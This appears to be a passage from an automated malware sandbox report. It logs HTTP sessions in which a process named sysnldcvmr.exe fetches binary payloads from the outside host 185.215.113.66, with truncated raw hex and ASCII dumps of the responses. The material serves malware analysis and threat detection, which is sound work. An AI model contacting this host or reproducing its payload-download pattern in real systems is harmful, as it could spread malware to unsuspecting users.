                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:58.674783945 CET1236INData Raw: e0 3a 4a 02 85 f5 a4 03 2f 65 b6 dd da 02 55 5c 65 70 1b ad 08 16 a9 67 57 4b d8 14 84 0a 9c b4 63 15 da 40 cb e9 ff 65 be 96 0c 72 59 37 bd 3e bf 28 9c f1 f9 0c 66 35 61 40 a3 60 92 2f 0b 32 fc 15 9a 0d 42 b5 76 e1 28 e0 86 4d 7d 4a bb c2 e4 5e
                                                                                                                                                                                                                                                  Data Ascii: :J/eU\epgWKc@erY7>(f5a@`/2Bv(M}J^!P8XG+oP,8Jp$U%-I<x[^Bpas>pc46Hhtl!{I:H]L(+-W`KkE_P@%
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:58.674797058 CET1236INData Raw: a7 97 2e b5 88 41 8f e6 27 86 3d 2b 9a 04 17 99 97 3c 83 9e 6e 53 eb 63 6f dd 7a fd f7 95 25 4a d0 ed 3d c9 5a f3 ad a3 e8 ce 16 05 83 20 3e 21 4a a5 75 41 19 f3 0e 03 68 57 7a 03 4c dc 8b fc 38 5c 2d 02 df 55 1d 64 dd 7e 11 db 81 a9 ec 3a 0c 25
                                                                                                                                                                                                                                                  Data Ascii: .A'=+<nScoz%J=Z >!JuAhWzL8\-Ud~:%-7&=v66QWdd6">%0#ys#-4ZdWM"D\`-4)@Zl9I<M`XkUsRU7ZAWqff <>j+Sh.
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:58.674809933 CET1236INData Raw: 2d 92 e5 ea 8d 23 8f e0 00 6c 7d 10 e3 13 f8 ef 45 26 51 dc c2 0f 14 46 bc 26 0b e6 f5 a1 0c 74 57 0d 28 46 e0 c0 04 7f 7a 4a 2d be 4e 55 20 53 1d 5f f8 f4 4b 0d ca 73 46 8e 30 6e 42 d8 8c cc 64 1e 6b 15 ab 17 e0 c4 b5 5f a6 8c 3f ba d0 cf ee 4c
                                                                                                                                                                                                                                                  Data Ascii: -#l}E&QF&tW(FzJ-NU S_KsF0nBdk_?LVmTe0*.1|8]0siWQs8`x)2*@hLd'ER@UI1><!vMYt%jM&T'0ywQbjApm7d`YA
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:58.675005913 CET1236INData Raw: d0 25 58 e9 40 e0 b3 ab 33 7c 5f f4 c4 4d 1e 7c a8 03 37 48 c8 fd c8 54 d5 df 0a 97 bf 5d 05 11 40 b4 d9 a8 8d f0 91 06 ac 98 60 35 56 95 c9 18 1a 37 cd 06 40 d6 01 c8 87 13 dd 7a d9 02 f9 5b 3f c7 ea df f2 3b 8a d5 3b 41 f9 25 c6 8b b0 1d 1a 6d
                                                                                                                                                                                                                                                  Data Ascii: %X@3|_M|7HT]@`5V7@z[?;;A%mG{Ll70{Tw(g(]NbJ]%abb.R.EZbPQX"7W/*^[oDM18xmy'/a=whQ`YvE9IjPw5Hx
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:58.675019979 CET860INData Raw: d0 cf b6 a4 4a 49 2e d7 2f e4 f4 db fd 78 18 df 11 2f 17 d6 41 9a 37 dd 5c 5b 0f 17 8c 6d 98 10 47 1b fa 8f 9c 80 b9 30 ff ab 2d f7 5b 8a 98 ed af 61 e3 ec e8 67 94 61 d4 e0 41 67 4a 3b bf b6 19 da b6 71 98 d7 14 ed af f8 fe 2b aa c7 aa 45 0e 40
                                                                                                                                                                                                                                                  Data Ascii: JI./x/A7\[mG0-[agaAgJ;q+E@@B+{kOp4FXZ]:+k![1=8IO|*G&AJflGK%#\uP<)X/l|H_uQ<?:)yfdQaYx#+pMAn22Q ^tN\Xc


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  44192.168.2.1150063185.215.113.66807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:00.986381054 CET166OUTGET /2 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:02.359956026 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:35:02 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 10496
                                                                                                                                                                                                                                                  Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "67154d18-2900"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: |@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\|wBvugOX% hr9:|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c|gL0)cM]oL{:En:?|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:02.359975100 CET124INData Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96
                                                                                                                                                                                                                                                  Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O>
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:02.360426903 CET1236INData Raw: 2a a9 81 d6 fd 42 20 61 77 b3 e1 96 27 26 69 a5 a5 fd 12 45 e7 70 8e 52 61 02 17 bc a9 fa 4d a1 ea eb 5a fb ad a9 7c e3 d6 09 c7 bf 33 87 46 cc 6b 3c ed 6c d3 51 3b fe c7 be d3 12 b7 d8 47 62 86 b4 a5 12 50 1b 06 4d 8c ed 6c 18 68 d3 b2 17 e9 35
                                                                                                                                                                                                                                                  Data Ascii: *B aw'&iEpRaMZ|3Fk<lQ;GbPMlh5}8m;ajW,N7&QKh.([gXC~Slm7lg0hd7NnyM8%Qf7|VbF9?gk{is6u_pi!
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:02.360477924 CET1236INData Raw: 4b dc 75 22 a9 31 18 da 58 da 9c 5b 38 49 62 0f b2 64 bd f8 00 b5 79 6d 2d 2a c5 7c 0a c5 a7 e9 1e a3 fd 06 2b 0f de a6 3e 61 08 18 aa 60 84 ce 3c fb 5a cc 21 25 12 f9 d9 17 a6 7c 20 a2 34 26 b5 80 dc bc 1c fc 99 e4 5b 2b d1 75 73 4c 5e a1 c3 65
                                                                                                                                                                                                                                                  Data Ascii: Ku"1X[8Ibdym-*|+>a`<Z!%| 4&[+usL^etpuu);Xb<>M\SAPwDc[8q-!q]c7vp.nnF{<~zdrmXt$8&2c^_E98k-
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:02.360487938 CET248INData Raw: 0b 3e 1f 18 b4 22 57 d9 8b 7c 31 98 16 87 ae e9 52 72 6d 5d c2 16 1d 54 31 c6 26 50 53 c5 b3 54 51 99 ab e5 bf ce ab 5a 8a 71 45 74 67 a4 63 0c 5b 55 2a 2c 09 40 f8 fc e9 05 9a 85 93 2b 1f c2 e7 ee b8 e5 f1 4c c2 16 6f c2 52 95 cb 30 72 4d 77 66
                                                                                                                                                                                                                                                  Data Ascii: >"W|1Rrm]T1&PSTQZqEtgc[U*,@+LoR0rMwfu^VUzcie_$eM;Bni,9Y;pz@Elc.}JW>4=\u=F%$%_^R'IK4]x+.i/ qh['3(@
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:02.360698938 CET1236INData Raw: b3 98 60 7b c2 fe 18 6e 6c 3b f9 ac a2 de d3 91 55 a0 66 42 35 cf 21 d2 35 e4 39 75 47 bc 4a 30 fd b3 ec 68 e2 05 c4 c5 0d b9 52 96 f9 ee 21 eb 75 28 d5 c0 2a 64 ef c0 3a ab 95 53 65 fa 72 6b 02 d9 89 0d 29 a1 42 a0 92 05 af 99 89 64 03 c4 b2 ec
                                                                                                                                                                                                                                                  Data Ascii: `{nl;UfB5!59uGJ0hR!u(*d:Serk)BdWmlE)Mt9G2?=L*{Pq CT dsHHw+~1uDu,;xuv&eaAwm])pQ`Hvn
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:02.360769987 CET1236INData Raw: 5d d4 ae 87 4b 4c 5c f5 f8 b1 42 1c 64 40 21 dd a9 b2 1b 90 9c 81 19 71 86 63 c3 42 58 66 10 97 16 6b 3d 84 2a 17 7d 6e 66 0d 82 1c 4b 89 f7 0c b4 fc 57 4c fe e5 46 ad 79 7f 9e 36 a4 b2 71 69 ed a1 f5 ad 6a 09 6a c9 cc 71 82 36 aa fa 62 12 93 06
                                                                                                                                                                                                                                                  Data Ascii: ]KL\Bd@!qcBXfk=*}nfKWLFy6qijjq6b&?:2c4]&`iDl=z4EdgAD7&iM:_GHkd*UDfMvJ_;Pk9njT:S;7#B0;s9MxF!o-0.Iq&
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:02.360780001 CET248INData Raw: 15 0a b1 41 8b 4d 2d 18 0d 2f 21 95 f5 2c 5d 7f 02 b3 e1 61 f1 81 14 90 ff a6 59 49 c6 b6 95 e1 52 b6 70 e5 9f b1 d7 6f 16 6f 39 ca 52 7f 6a 8d eb 57 0c 60 75 2d b8 22 aa d4 b9 c2 57 7d 76 34 64 44 38 78 a0 68 d0 a0 44 9b 74 71 55 fa f6 a6 80 b6
                                                                                                                                                                                                                                                  Data Ascii: AM-/!,]aYIRpoo9RjW`u-"W}v4dD8xhDtqUl/2:O!iKv^l1=>rJ!;=wJo OhzO=q~qF.Bth]QL>uAZ Zva"HIbKd
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:02.361141920 CET1236INData Raw: 1f c2 c0 01 a9 a1 6d 1c 12 79 22 13 1e 59 39 ac 6f ba 33 c7 51 89 42 71 cf 1c 0c 8a a5 b3 a3 8e 59 56 d1 23 1f 09 19 56 72 38 9b 0a 43 a7 37 de 43 6c 55 38 2e 2a 20 8e 0e 09 cd b6 08 2f b5 3b 37 dc 28 bb df 5e eb 88 be 15 b4 5a 53 48 ba 3e 33 d6
                                                                                                                                                                                                                                                  Data Ascii: my"Y9o3QBqYV#Vr8C7ClU8.* /;7(^ZSH>3b\hljGkcy`L@&C7W{lxe;c|<>i+,R:ecIfgIDpU^16gr2g"{Sq#<m0r
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:02.361223936 CET1236INData Raw: f5 12 b9 95 02 be ba 75 47 ee c3 6f 92 65 e2 78 09 e4 c1 46 cc f6 1a 2a bb a3 8c 2d 7e 51 f6 94 14 b6 19 09 ee 3b 59 30 f7 6f 71 62 a9 7f 81 06 da ca f3 13 9d 08 c3 db 3d 8f 67 08 aa a4 cf 1e b1 d0 cd dc 50 14 2f 04 2d fd 11 53 e2 ae a4 dc c9 10
                                                                                                                                                                                                                                                  Data Ascii: uGoexF*-~Q;Y0oqb=gP/-SeccZ?m_=UVTM'aYv_w&%k"- 1?3ul2'Kus2)^XCO"N"^E]zgh[
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:02.479898930 CET248INData Raw: c9 88 00 75 4b d3 b6 be 4d 95 9b 0d 4d f4 17 76 5e fa 2b 9b 0d 20 96 0b b5 51 59 b2 eb 86 49 f2 fd df a5 5f 55 95 cb 16 94 79 43 38 76 1d ea 1d 23 22 0d e0 3d dc cd 3c 89 ff 1c ea 64 59 7a 0c 20 7f 25 9a ba 2e 3a 4f cf b4 fc 36 ca 60 fb 02 2f fb
                                                                                                                                                                                                                                                  Data Ascii: uKMMv^+ QYI_UyC8v#"=<dYz %.:O6`/Js=vHBjc0nWNl+7AQ5J'uy^X=T?2hVgpk, R^C!oO.^;G@ ;/0#1myu)p


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  45192.168.2.1150064185.215.113.66807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:04.836057901 CET166OUTGET /3 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:06.197885036 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:35:05 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 55040
                                                                                                                                                                                                                                                  Last-Modified: Sat, 30 Nov 2024 15:55:38 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "674b357a-d700"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 71 55 bf 68 00 78 5e 05 bf 77 f1 ce 6a 84 34 af 59 54 f4 9a 7f 2e 9e 56 5c 9f 90 cf 88 27 49 60 23 c8 18 58 ef 00 f5 4c be 7d 1c 91 c4 34 02 a2 5c 3c 0d 4e 55 81 f8 05 ac ee cb 01 3b 46 d2 9c 58 e4 0f 57 22 b2 cd 6b b7 cc 33 3f be b9 da e2 c1 f2 64 fc e6 50 f4 9a 92 a5 f5 09 a8 09 a7 c7 da 31 7d 87 96 31 55 a4 1a d0 ba a1 26 ba b8 99 69 1d 33 dc 14 0f 1c 89 01 e6 63 3c 95 aa 53 61 58 04 03 e1 40 77 fb 5f 23 b2 e6 ef 48 bb 0d da b9 71 4f 5c 1b bf 2d 19 31 22 20 7c 90 25 4c a9 42 7c 7d b5 72 c6 73 d7 e6 e2 bc c8 de e2 46 c0 f0 c7 86 98 ef 5b b4 36 d4 af 0f dd d9 cf 96 3a ae 7e 9f c1 2c 54 45 11 30 e9 3e f6 a0 0c 58 a7 ed 3c 7a d4 d4 8e 7e fd 5d 2c a2 dc 17 0f 69 98 fe 29 2d 23 fc 4f a1 61 fb e3 d4 f3 0f 4b b1 33 49 91 45 9f 62 e1 a2 13 f5 5c 5d 8f c4 f6 8b c7 30 c5 0b 16 f6 6f f6 71 a2 69 a7 be c7 a0 ad 0c 22 4b 33 e3 10 dd f4 ad 9d c9 f9 ba 6b 9d 18 b7 b7 99 bf f8 3e bf 51 8f e7 79 e1 e2 02 f7 6b a1 21 e1 93 c9 31 90 95 64 be 3c 55 a3 bc b1 6e 93 47 c8 b4 34 76 3f 40 1c 6f b5 f6 6f e2 0a a6 f3 70 3f [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: qUhx^wj4YT.V\'I`#XL}4\<NU;FXW"k3?dP1}1U&i3c<SaX@w_#HqO\-1" |%LB|}rsF[6:~,TE0>X<z~],i)-#OaK3IEb\]0oqi"K3k>Qyk!1d<UnG4v?@oop?t Q@>VeGy6-:p~w!:zq<|TwX?Fq)3Pr|\jFC4wa|zk9eT*G$IFxP!+*(Wjv2G6;axnMd<?IA0![eLQ'Ju$%6b$V"2yvRKbPUH!@uQ+Zp,j%nf]k1'+|~z0g[:e2?zO*_X8IhveZ9:iOSgly{`bx6R-bHWhgF[oDzz68lty<}Du56T;,{stYZL1"!hJy^cqVNWAy<I7fo-)m/$f55KqQ*chAZM,v@O$j ^t)%BlCWv[ZBO8:L=-
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:06.197952986 CET124INData Raw: 5b 45 cd 42 00 1c 84 28 01 50 de 3b 22 91 56 cf e9 a7 2b 5b f3 ba d0 65 3e d9 cc 07 bf 4f ee 6c a9 19 5b ee bb 28 49 cc e1 f2 28 87 3c e0 d7 ff a4 0a 34 6f 49 d4 2a 8b a8 f8 bc 1a 35 e9 59 59 81 c3 15 fd 6e cb be 09 bb e1 99 dc e7 12 87 9c 23 b5
                                                                                                                                                                                                                                                  Data Ascii: [EB(P;"V+[e>Ol[(I(<4oI*5YYn#XGqenlH=F<S["z{{"
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:06.201807022 CET1236INData Raw: 6c fe cd 45 55 b9 8c 37 fb e0 65 e2 c7 a6 e8 ca 2e e7 36 11 cb 44 07 75 cb 65 86 30 68 e9 80 ff a2 f2 50 8d 9f ef f0 d7 88 1a 9c d0 44 c8 07 20 87 df eb 5f aa 42 af 74 3b f3 0f c4 18 25 80 2a b4 f7 48 e6 5f 1a db a2 ab 62 43 40 ea 39 f6 86 e6 0a
                                                                                                                                                                                                                                                  Data Ascii: lEU7e.6Due0hPD _Bt;%*H_bC@97U8,/&U5Ck]ocRO3hW|Sz#0#|)8_wo=`w9rvM$&qfkc];j`PWbOxH2me7q-kAqD_Pk
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:06.201867104 CET1236INData Raw: 7b 36 a6 49 ac 18 96 02 5c 26 ff 36 f8 c6 2f da 11 03 0b 43 42 d5 f1 fa 41 49 12 5f 6a f7 0d ab 9c 22 da 0e e6 73 5c a7 63 55 c5 7a be 68 9a 7b ab 24 23 8f b8 90 f1 46 3f dc 40 7f eb fc ff f9 de 79 f0 46 f0 1c bf c3 28 8f 7e 59 df 83 6b 13 f2 9e
                                                                                                                                                                                                                                                  Data Ascii: {6I\&6/CBAI_j"s\cUzh{$#F?@yF(~YkV.3T#|;d!q?+y<ptwL(>qvj?}Ip9f&)ta/kkPSHD+$"S$>p\"}q@&}X~{4SSz99)T
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:06.201877117 CET248INData Raw: 7b c2 28 ec 12 68 73 af f0 35 fa 92 0d 6e d3 4c 18 d1 e8 8f c4 a1 15 0c 44 f9 b6 78 31 a0 fd 7f 79 99 72 c6 f0 73 47 e9 0f 40 94 99 fb e1 f0 b4 d5 8f 6d d3 2c 32 8b 19 0f 58 f0 2e 41 9c f2 6f 5b 46 89 a3 28 dc 95 c6 72 a2 e2 61 ac 48 43 c4 a9 bc
                                                                                                                                                                                                                                                  Data Ascii: {(hs5nLDx1yrsG@m,2X.Ao[F(raHC&i/r"j4izzA9cLWIt_h+nLh-=-&vqSO@O<0gm:TtwnKmhmm@A>xa!@ZcI:#u
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:06.205334902 CET1236INData Raw: 19 a0 24 4b da 1e 29 2e b8 90 9c 19 04 be a0 c4 89 13 1c 0f aa 93 20 f3 19 9e b4 84 fb e1 14 78 a7 00 52 e2 02 4c b2 23 82 28 ac f5 b8 d9 a2 cf 34 a1 59 dc ee fd 95 3e 18 9b 64 03 51 58 ab bf d0 e1 e3 e5 36 f2 4d fe 5c 19 c0 e8 22 65 10 8a 26 7e
                                                                                                                                                                                                                                                  Data Ascii: $K). xRL#(4Y>dQX6M\"e&~,r7e>l=U-v"HPC|)27gJ_nsZ'<!.xRt8HIDE1@P[lZ/\!A"7$yU?&
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:06.205389977 CET1236INData Raw: e3 c7 0b d2 07 66 a2 02 df 9b c5 ad ab 86 33 77 7c 85 cf 8e 02 e9 ff 0a 52 b6 86 0a 21 68 f0 58 ca f5 19 d1 1f 7e eb d9 06 ec 62 12 90 c3 a8 07 cc ab 65 62 96 7c 42 a0 c7 96 0d 36 40 4f ee 7a 37 4c 55 60 da 2d 0c 43 d9 ee 18 23 31 42 c0 08 0f e1
                                                                                                                                                                                                                                                  Data Ascii: f3w|R!hX~beb|B6@Oz7LU`-C#1B13*8:X5PyaRb;6CXX-+X0{r7^M(:{w9Oz6k`m"q2T;auZOn.i^
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:06.205400944 CET248INData Raw: 8b f1 53 ed 23 89 32 81 6a bd ac 31 f6 9e 1b 21 44 9f d0 ec 52 3c e7 1c f1 5f 27 92 ba 55 b5 ac 17 95 c8 e8 2a 81 72 92 e4 d3 9b 75 7a 3a 81 3a 47 c0 9d 6e d4 bb 70 d3 d3 62 2d fc c9 2d a8 43 c5 85 d8 06 4b 95 4d 8f 6a a5 64 23 d1 2f ec 3d 2b 2c
                                                                                                                                                                                                                                                  Data Ascii: S#2j1!DR<_'U*ruz::Gnpb--CKMjd#/=+,9D~GNR4:m{e13POt0:<E3 -zPqh_{,@K7IHJ<o:]v(-d*CZ`p7(uiHd=)d3@<
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:06.208853006 CET1236INData Raw: 17 43 81 f0 03 28 4e 24 a8 e2 3f 60 47 a1 6f 7b ec 56 d9 24 37 5a 16 c7 eb 35 dc 0e ed 65 da f8 49 f7 cc 2b 36 d8 0f 7d 66 42 a9 b8 85 ec bf 11 2a 77 a0 34 47 30 6f 7f 41 eb 96 c9 07 bc 08 47 23 99 e4 a4 6f f9 66 df 48 58 04 59 25 99 cb 97 2b f2
                                                                                                                                                                                                                                                  Data Ascii: C(N$?`Go{V$7Z5eI+6}fB*w4G0oAG#ofHXY%+CVFJq0`24NEEGWOI+3C^)^+KBSocNu\QlIj;vw(e7%3P8L97p,#0^4U[D.-Y
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:06.208919048 CET1236INData Raw: 5a ac 51 67 01 3a 92 a1 ff f7 16 2a 46 98 21 45 9c 86 aa 78 86 b6 91 f2 e4 79 5a 79 6c ff b8 36 11 0d 46 b5 28 67 4f 17 25 c6 46 1d f0 6e a1 5f 5c 30 a3 52 df 5f d9 a2 ad 4a ff 0f 95 c9 36 8d bf 83 c5 bf c8 e5 47 08 f9 e3 09 7d 86 8c 8b 98 db 6f
                                                                                                                                                                                                                                                  Data Ascii: ZQg:*F!ExyZyl6F(gO%Fn_\0R_J6G}oJ&bBypG`6~!!S'?`?\i#Y%3xZT/qU^bIn/n}JGG-vam2T5*a.v"[Fu#!D*
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:06.318001032 CET1236INData Raw: 0f b3 d3 05 79 4d 7a a8 6e 58 5a 01 53 d0 02 cb c3 2b 86 63 b6 7f 83 2e eb 0d 93 a1 9d ed 03 12 e4 de 0b d4 1f da f1 2b 75 78 ac 0d d8 d3 d1 37 d3 d4 f5 3d b8 11 26 a3 c7 da 52 4d 50 d2 ae 12 55 a0 a6 f8 4b e6 c8 f4 f8 85 9b 93 57 cb 3a 31 c6 52
                                                                                                                                                                                                                                                  Data Ascii: yMznXZS+c.+ux7=&RMPUKW:1RuY[?@b DYSC^b`a85+N="p-1j'`G$hixmdkeym8)|Sm*7Q%gDUw'P(+P{lC\q"b


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  46192.168.2.1150066185.215.113.66807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:08.470190048 CET166OUTGET /4 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:09.837469101 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:35:09 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 63232
                                                                                                                                                                                                                                                  Last-Modified: Fri, 29 Nov 2024 08:44:56 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "67497f08-f700"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 33 f7 8b 96 d4 1c c5 f7 02 2d 3b f9 29 56 f5 f4 d6 d1 ab 1d a3 07 e3 94 06 db 98 58 8f a8 15 fd 7f 2a 5c a2 5a 7f 5e 53 dd 1e fd e9 2c 6e ac ad 71 ea 1a b3 2e 68 a2 20 49 ea a8 e0 84 a0 ef a9 83 65 db 9d c7 bf e1 92 3b 5a 7a b1 38 27 e1 0e b1 ad 9d 34 46 80 b2 41 72 1e b0 61 3d 58 04 36 4f 34 af 33 66 98 c3 62 e4 2d ff 5c 75 75 f3 20 e7 79 37 9b 19 b5 17 a2 ce 84 0a ad d0 c6 8c 15 30 70 5c 6b c4 92 aa 2c 95 d8 e3 b8 4e 58 6e 38 a5 ae f3 d7 30 b0 d0 18 34 65 f2 a6 49 88 07 9f 4f f7 44 af 44 64 61 ed de 19 46 71 f9 82 32 a3 5f 55 4f 88 b3 af c3 b3 37 c2 77 a2 6b 03 99 84 a0 97 c7 fa 4e 6c 85 2e d1 c9 a0 c9 63 48 9a bc 6b 3d 82 6b 52 64 94 fb 2d 30 37 3c af 78 bb d8 61 5c a1 84 19 88 fb e8 59 e6 d1 32 4a 01 8b ed 59 ef 69 92 b3 3f f8 1c ef 81 73 9a c2 56 62 00 68 5c ee ab 06 14 2f 08 27 10 3d f9 3b 0f 17 a5 5f 99 05 c8 b2 9b 39 e6 7f 4d c9 53 2a b9 8d 3b d9 b9 66 cd d5 f0 d9 d8 1f a6 78 8f 3b 7b 6c c2 42 40 2c b3 8b 4c e3 46 03 3f a4 77 00 31 00 62 2e 43 56 7d d7 90 dd c5 c5 37 b1 d9 e9 3d 04 fc 73 2f [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: 3-;)VX*\Z^S,nq.h Ie;Zz8'4FAra=X6O43fb-\uu y70p\k,NXn804eIODDdaFq2_UO7wkNl.cHk=kRd-07<xa\Y2JYi?sVbh\/'=;_9MS*;fx;{lB@,LF?w1b.CV}7=s/pQ[Gm+P3]1Y[)e=t|*wOQ;}GF:m k'h:rgrM$wygS^`3s^Ye2554KJL!.j^R4o6g?{x}iX1?rW-m4v&n%l:_yNauT}T!V9DKLM9#,f\c^870(7AVB4sy.mE$IRHF'!,a's\$qHV[*9RSrzKI74HyNtnC wY8Ih6;>EDbyEWIchP&="1".'R;a_-Uy/24(suQyGO8`)u3g9lW2(P>2^'r{g_!0i-(bgT?JfilC2`-N=TM[
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:09.837501049 CET1236INData Raw: a9 e4 31 7f 61 96 d8 96 40 d0 9f 93 a5 20 8b 23 6f 3b cb 14 d6 52 f3 60 5f 88 a5 fd a6 7c 23 ca 95 7c 9b 98 8a dc 48 a2 ce 25 dd e3 81 30 53 09 1d 48 b4 39 7e ba 60 9d a5 86 b9 61 f6 17 af 61 2d e9 06 e3 ef ad 31 67 8c 1b 48 29 32 bf dc ac 73 0d
                                                                                                                                                                                                                                                  Data Ascii: 1a@ #o;R`_|#|H%0SH9~`aa-1gH)2sLGnc <k[63N"O"Aer^1F.D[`\O5D}+aL.A`}4)wx#0J!8{(dw!DJ;hz|d
